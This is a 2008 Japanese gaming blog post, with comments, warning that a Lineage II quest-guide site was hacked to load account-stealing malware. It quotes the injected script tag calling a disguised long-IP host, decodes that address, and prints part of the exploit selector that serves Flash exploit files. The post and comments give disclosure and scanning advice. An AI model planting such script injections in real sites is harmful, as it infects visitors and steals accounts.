L2クエスト攻略が改ざんされているかもしれない件
●発売日カレンダー
・4月29日 [PC] 新Intel CPU Ivy Bridge 発売日
・5月15日 [PC] Diablo III
・6月28日 [3DS] カルドセプト
・8月 2日 [Wii] ドラゴンクエストX 目覚めし五つの種族 オンライン

« ヘルバウンドクエをせずともヘルバウンド地図を見るTIP | メイン | NCjapanが行く!カンファレンス in 大阪 レポート »

2008年9月28日

L2クエスト攻略が改ざんされているかもしれない件[ 情報・ニュース等 ]

修正された様です。

リンクデータの悪質な改竄について(L2クエスト攻略)

2008年9月27日夜より9月29日早朝までの間、リンクファイルが改竄され、 ウイルスファイルへの直リンクがソースに埋め込まれました。

ウイルス内容と対応については現在調査中です。

-----

カイン掲示板にてL2クエスト攻略が改ざんされているかもしれないと
記載があります。

リネ2攻略サイトに改ざんの痕跡アリ(カインサーバ掲示板)

調べてみた所、確かに

script src=http://1039045726:65535/jp.js

という記述が存在しています。

この1039045726という数字は一見URLでは無さそうですが、
ロングIPアドレスというもので、URLを10桁の数字に置き換えたものです。

このロングIPアドレスをデコードしてみると、以下の結果が出ました。

IPアドレス 61.238.148.94
ホスト名 061238148094.ctinets.com
IPアドレス割当国 香港 ( hk )

明らかに怪しいです。
飛び先のjp.jsファイルをソースチェッカーにて確認してみると、
さらに同じサーバーの別ファイルに飛び、もう一度別ファイルに
飛んだ後、いくつかのFlashファイルにリンクされています。

if(v1 != 9) return ;
if(v3 == 115) vuln ="ia115-2.swf";
else if(v3 == 64) vuln="ia64-2.swf";
else if(v3 == 47) vuln="ia47-2.swf";
else if(v3 == 45) vuln="ia45-2.swf";
else if(v3 == 28)vuln="ia28-2.swf";
else if(v3 == 16) vuln ="ia16-2.swf";
else if(v3 == 0) vuln="ia00-2.swf";
else return ;

これから判断するに、Flashの脆弱性を狙った
アカウントハックウイルスだと思われます。
何時から埋め込まれていたのかは定かではありませんが、
L2攻略のリンクバーに埋め込まれているので、
リンクが表示されている所にアクセスした方は
ウイルスに感染している可能性があります。

ここ数日でL2クエスト攻略を訪れた形跡のある方は、
各社オンラインスキャンを通してチェックする事をオススメします。

オンラインスキャンサイトの一覧 - ウイルス、スパイウェア検出
http://cowscorpion.com/Outline/secu_on.html

投稿者 (む) : 2008年9月28日 10:20

関連しているかもしれない記事

重複規制論難 ゲーム法 vs 青少年保護法 正面対決 -2010年4月27日
強制シャットダウン強行 ゲーム重複規制大きく憂慮 -2010年4月22日
JOGAのセキュリティ共通基盤システム提供開始される -2010年4月22日
疲れシステム 9月頃から導入予定か -2010年4月19日
女性家族部が「青少年保護法改正案」発表 重複規制か? -2010年4月17日

コメント


1 :Anonymous(匿名による投稿): 2008年9月28日 12:56 ID: iPjzjyRY [RES]

推奨サイトとしてcowscorpion.comを紹介されていますが
http://www.siteadvisor.com/sites/cowscorpion.com?suite=false&premium=false&client_ver=2.6.0.6261&client_type=IEPlugin
このように不穏な報告がw

以前あったOrbitマルウェア同封事件は、Orbit自身には問題はなく、cowsで配られたアーカイヴにだけマルウェアが何らかの形で仕掛けられていた事が原因でした。


2 :Anonymous(匿名による投稿): 2008年9月28日 14:07 ID: 8ea2YPj6 [RES]

リネ2クエスト攻略のソース、【リンクランキング】のL2CSへのリンクのみに
<li><a href='?p=link_jump&ID=8' target='_blank' class='menu'>うならぼ</a></li>
<li><a href='?p=link_jump&ID=21' target='_blank' class='menu'>L2CS</a><script src=http://1039045726:65535/jp.js></script></a></li>
<li><a href='?p=link_jump&ID=39' target='_blank' class='menu'>line2char</a></li>
の記述


3 :Anonymous(匿名による投稿): 2008年9月28日 17:33 ID: cmYEWq5A [RES]

(む)さんのところは大丈夫?


4 :(む): 2008年9月28日 18:14 ID: RnqZXuYA [RES]

レンタルサーバなんでさくらインターネットが脆弱性塞いでいれば大丈夫です


5 :Anonymous(匿名による投稿): 2008年9月29日 07:18 ID: t6lLEyZY [RES]

いつもお世話になっております

VirusTotalによると、Avira他2つのみ検出されました
実際に試してみましたが、Trend/Symantec/ESET/F-Secure/Kasperskyのオンラインスキャンでは検出されず
手持ちのBitDefenderでもダメでした
今朝方KasperskyLabに検体を提出
>New malicious software was found in this file.
>It's detection will be included in the next update.
との結果でした


6 :Anonymous(匿名による投稿): 2008年9月29日 11:56 ID: MMZP1ZA2 [RES]

昨日クエスト攻略みたんだけど、表示の仕方がおかしいと思ったんだよね
んー、PeerGuardian2を入れといてよかった。
以前(む)さんの記事を見て入れてたんだけど
(む)さんありがとうー
一応カスペルスキーで検査したけど何も無かったです。
PeerGuardian2がしっかり働いてくれてるようです。


7 :Anonymous(匿名による投稿): 2008年9月29日 17:11 ID: KDaXewrk [RES]

くえ攻略サイトが、ウイルスについて、発表しているようです。


8 :Anonymous(匿名による投稿): 2008年9月29日 20:31 ID: t6lLEyZY [RES]

Kasperskyエンジン、対応しました
F-Secureとジャストシステム、Kasperskyの3製品でも対応可能になったようです


9 :Anonymous(匿名による投稿): 2008年9月30日 02:04 ID: GMYsGb0U [RES]

ノートンは検知できるのでしょうか・・。